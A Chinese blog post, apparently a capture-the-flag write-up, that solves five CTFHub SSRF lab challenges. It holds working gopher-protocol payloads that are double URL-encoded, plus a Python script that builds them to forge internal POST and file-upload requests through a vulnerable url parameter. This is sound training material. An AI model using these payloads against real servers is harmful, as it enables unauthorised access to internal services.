CTFHub SSRF 1-5

最新推荐文章于 2024-08-13 18:07:52 发布
最新推荐文章于 2024-08-13 18:07:52 发布
阅读量448 收藏
点赞数 13
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzf011900/article/details/134561781
版权

内网访问

启动靶场

因为有提示所以直接访问127.0.0.1/flag.php得出flag

伪协议读取文件

提示显示读取web下的flag.php

因为linux下的web路径默认是/var/www/html所以直接输入就出来了

端口扫描

老样子有提示所以url输入=http://127.0.0.1:8000然后拿burp抓包用狙击手搞一下

下面的图片有显示因为状态码一样 所以看长度有个不一样的直接就出来了

post请求

dirsearch扫了一下看到有index.php

虽然有提醒但是还是不知道干啥所以先从url里面查http://127.0.0.1/flag.php

可以看到有key值提交到上面没啥用但是我们知道需要提交key值才能得到flag

所以只要往flag.php传key值就可以得到flag  而index.php可以利用curl传url   那么我们可以用gopher协议在index.php中构造post请求包往flag.php传key值以此获取flag

想到了gopher伪协议(curl支持gopher),发送GET或POST请求(需要配合http协议二次url编码上传);本题要用gopher发送POST请求,gopher的格式是gopher://<host>:<port>/<gopher-path>_后接tcp流,本题默认伪gopher://127.0.0.1:80/_后接post请求 ,完整的gopher请求如下:

gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1

Host: 127.0.0.1:80

Content-Type: application/x-www-form-urlencoded

Content-Length: 36

key=5879a4cfc3cd3739942d9b10e612b473

(key值记得换自己的)

然后我们将它进行url编码,进行编码时要注意:

回车换行要变为%0d%0a,但如果直接用工具转,可能只会有%0a

在HTTP包的最后要加%0d%0a,代表消息结束(具体可研究HTTP包结束)

要进行几次url编码呢?本题相当于有两次请求(post请求本身算一次,放进url=gopher...中算第二次),因此要进行两次url编码,编码结果是:

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250d%250AHost:%2520127.0.0.1:80%250d%250AContent-Type:%2520application/x-www-form-urlencoded%250d%250AContent-Length:%252036%250d%250A%250d%250Akey=5879a4cfc3cd3739942d9b10e612b473%250d%250a

完整的是:

http://127.0.0.1:80/index.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application/x-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D5879a4cfc3cd3739942d9b10e612b473

Burp抓包放到重置器就出来了

文件上传

走gopher协议了,完整抓的包如下:

POST /flag.php HTTP/1.1

Host: 127.0.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------316258355439872129751386223845

Content-Length: 354

Origin: http://challenge-579f71a96c646564.sandbox.ctfhub.com:10800

Connection: close

Referer: http://challenge-579f71a96c646564.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php

Upgrade-Insecure-Requests: 1

-----------------------------316258355439872129751386223845

Content-Disposition: form-data; name="file"; filename="try.txt"

Content-Type: text/plain

I am BossFrank

-----------------------------316258355439872129751386223845

Content-Disposition: form-data; name="aaa"

æ交查询

-----------------------------316258355439872129751386223845—

我们要对这个包进行二次url编码,用python写一下好了:

import urllib.parse



payload =\



"""POST /flag.php HTTP/1.1



Host: 127.0.0.1



Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8



Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2



Accept-Encoding: gzip, deflate



Content-Type: multipart/form-data; boundary=---------------------------316258355439872129751386223845



Content-Length: 354



Origin: http://challenge-579f71a96c646564.sandbox.ctfhub.com:10800



Connection: close



Referer: http://challenge-579f71a96c646564.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php



Upgrade-Insecure-Requests: 1







-----------------------------316258355439872129751386223845



Content-Disposition: form-data; name="file"; filename="try.txt"



Content-Type: text/plain







I am BossFrank



-----------------------------316258355439872129751386223845



Content-Disposition: form-data; name="aaa"







æ交æ¥è¯¢



-----------------------------316258355439872129751386223845--







"""  



 



#注意payload的最后一行是回车(空行),表示http请求结束



tmp = urllib.parse.quote(payload)



new = tmp.replace('%0A', '%0D%0A')



new2 = urllib.parse.quote(new)



result = 'gopher://127.0.0.1:80/_'+new2



print(result)       # 这里因为是GET请求所以要进行两次url编码

运行代码,生成的编码后结果如下:

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------316258355439872129751386223845%250D%250AContent-Length%253A%2520354%250D%250AOrigin%253A%2520http%253A//challenge-579f71a96c646564.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-579f71a96c646564.sandbox.ctfhub.com%253A10800/%253Furl%253Dhttp%253A//127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------316258355439872129751386223845%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522try.txt%2522%250D%250AContent-Type%253A%2520text/plain%250D%250A%250D%250AI%2520am%2520BossFrank%250D%250A-----------------------------316258355439872129751386223845%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522aaa%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%25C3%25A6%25C2%259F%25C2%25A5%25C3%25A8%25C2%25AF%25C2%25A2%250D%250A-----------------------------316258355439872129751386223845--%250D%250A%250D%250A

放在url上就出来了

什么都好奇
关注
  • 13
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:check_mark: 它将很快有一个用户界面来指定您自己的回叫有效负载它将很快能够测试Json和XML 测试SMTP SSRF如何安装/建造git clone https://github.com/ethicalhackingplayground/ssrf-king gradle build 现在可以在...
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
浅谈ssrf漏洞
yggcwhat
12-13 3143
简介 SSRF(Server-Side Request Forgery)服务器端请求伪造, 是攻击者构造payload通过存在漏洞的服务器去攻击内网的其他主机或者服务器。正常都是通过外网打入内网的。 漏洞产生原理 其是有这漏洞,原理上还是在代码上,举个简单的例子: <?php if (isset($_POST['url'])) { $content = file_get_contents($_POST['url']); $filename ='./file/'; file_put_co
ssrf学习一
qq_51553814的博客
08-01 144
ctfhub ssrf学习一 内网访问 开启题目,打开网页,直接根据题目意思在url后面加127.0.0.1/flag.php 得到flag 伪协议读取文件 打开连接,根据题目意思,在url后接file:///var/www/html/ file:///是伪协议,伪协议种类有 file:/// dict:// sftp:// ldap:// tftp:// gopher:// 其他种类的伪协议也需要学习 后面的var/www/html是网站的基本目录, 访问完后请求包中发现flag 端口扫描
bugku 渗透靶场3
akxnxbshai的博客
04-01 1076
本题一共八个flag,主要是为了练习内网渗透的思路。
【CSRF,SSRF,XXE,PHP反序列化,Burpsuite】
一纸荒芜的博客
07-31 1278
本期主要介绍了CSRF,SSRF,XXE,PHP反序列化等漏洞,和bp常用模块。
CTFHub-SSRF
a21536545645的博客
07-07 316
原理: 有可控参数,并且这个可控参数可以用来访问其他网络,服务。那么就可以用这个参数,以目标主机为跳板,访问内网的资源或者访问外网。 一,内网访问 审题很重要 只有一个链接 根据提示访问127.0.0.1/flag.php就可以得到flag,但是用localhost就不行,应该是后台做了限制 后台的代码应该类似这样: <?php highlight_file(__FILE__); $url=$_GET['url']; $curl=curl_init($url); $res
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
第一节 SSRF原理介绍-01
09-15
1. 对外网、服务器所在内网、本地进行端口扫描,获取Banner信息。 2. 测试运行在内网或本地的应用程序。 3. 利用file协议读取本地文件等。 SSRF漏洞代码分析: 存在SSRF漏洞代码示例如下: function curl($url){ ...
模拟搜索引擎(蜘蛛)抓取页面
09-07 1255
转载于:https://my.oschina.net/wangchenyu/blog/1530852
这个SSRF 漏洞很酷
smellycat000的专栏
01-14 189
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队漏洞猎人Vedant 发现了一个可访问目标企业 AWS 元数据的 SSRF 漏洞,并详述了发现过程,如下。这个目标 web ...
thinkphp漏洞之sql注入漏洞-builder处漏洞
banliyaoguai的博客
08-09 514
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
android compose 设置 padding 和 margin
阿饱同学
08-08 296
在 Jetpack Compose 中,是一个非常灵活的布局工具。要在中设置padding和margin,需要分别使用padding修饰符和中的margin参数。
Android TV上OTT PWA应用开发的播放器选择:video.js vs exoplayer
Ranye的博客
08-08 270
本文从功能和性能两方面对比video.js和exoplayer的优劣
Chromium编译指南2024 - Android篇:前置要求(一)
守城小轩的技术窝棚
08-09 596
通过本篇文章,我们详细介绍了在 Android 平台上编译 Chromium 所需的前置要求,包括系统和硬件要求。确保您的开发环境满足这些要求,是成功编译 Chromium 的关键步骤。我们讨论了使用 Ubuntu 24.04 LTS 操作系统、安装 Git 和 Python 等必要软件,以及配备足够的 RAM 和磁盘空间的重要性。同时,我们强调了稳定高速的网络条件对于下载和同步源代码的影响。
【安卓】调用摄像头和相册
君子慎独,不欺暗室。卑以自牧,含章可贞。
08-13 720
新建一个CameraAlbumTest项目,然后修改activity_main.xml中的代码。此时运行程序会报一个错:Unable to decode stream: java.io.FileNotFoundException,没查到错是什么原因导致的,但是有解决方法。在res文件下找到xml目录(如果没有在res目录下新建目录)新建file,取名file_paths.xml。external-path就是用来指定Uri共享路径的,name属性的值可以随便填,path属性的值表示共享的具体路径。
Android gradle 构建
最新发布
shuizhizhiyin的专栏
08-13 487
构造函数注入 && 字段注入。实现: 在主项目的 build.gradle 中,定义一个 Transform 任务,并在 transform 方法中对输入文件进行操作。实现: 在主项目的 build.gradle 中,使用 afterEvaluate 闭包来获取子模块的 Gradle 任务,然后进行修改。实现: 在主项目的 build.gradle 中,使用 project 获取子模块的 Task 对象,然后进行修改。场景: 你需要在主项目的构建生命周期中获取子模块的 Gradle 任务并进行修改。
8.7笔记
2301_77801457的博客
08-07 436
​ ⼀、MySQL函数 数据分析的基础 1.排序 1.max 2.min 2.汇总 1.count 2.sum 3.avg 3.数制 1.⼆进制 1.0 0 2.11 3.210 4.311 5.4100 6. 2.⼋进制 3.⼗进制 4.⼗六进制 5.AA27 1、聚合函数 只有select⼦句和having⼦句、orderby⼦句中能使⽤聚合函数,where⼦句不能使⽤聚合函数。当使⽤聚合查询以后,不能使⽤where条件,如果要添加条件,就
CTFHUB SSRF文件上传
07-28
根据提供的引用内容,CTFHUB SSRF文件上传是指通过SSRF漏洞实现对目标服务器进行文件上传的攻击。在文件上传过程中,攻击者可以构造恶意请求,将文件上传到目标服务器上。具体的攻击方法可以使用常见的绕过技巧,如利用特殊字符、绕过短网址、利用特殊编码等。\[3\]同时,攻击者还可以通过修改请求头中的Content-Length字段来伪造文件大小,绕过服务器的文件上传限制。\[1\]\[2\]需要注意的是,CTFHUB SSRF文件上传是一种安全漏洞攻击,严禁在未授权的情况下进行此类行为,违法者将承担法律责任。 #### 引用[.reference_title] - *1* *2* *3* [CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)](https://blog.csdn.net/qq_31710331/article/details/119765578)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

什么都好奇

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值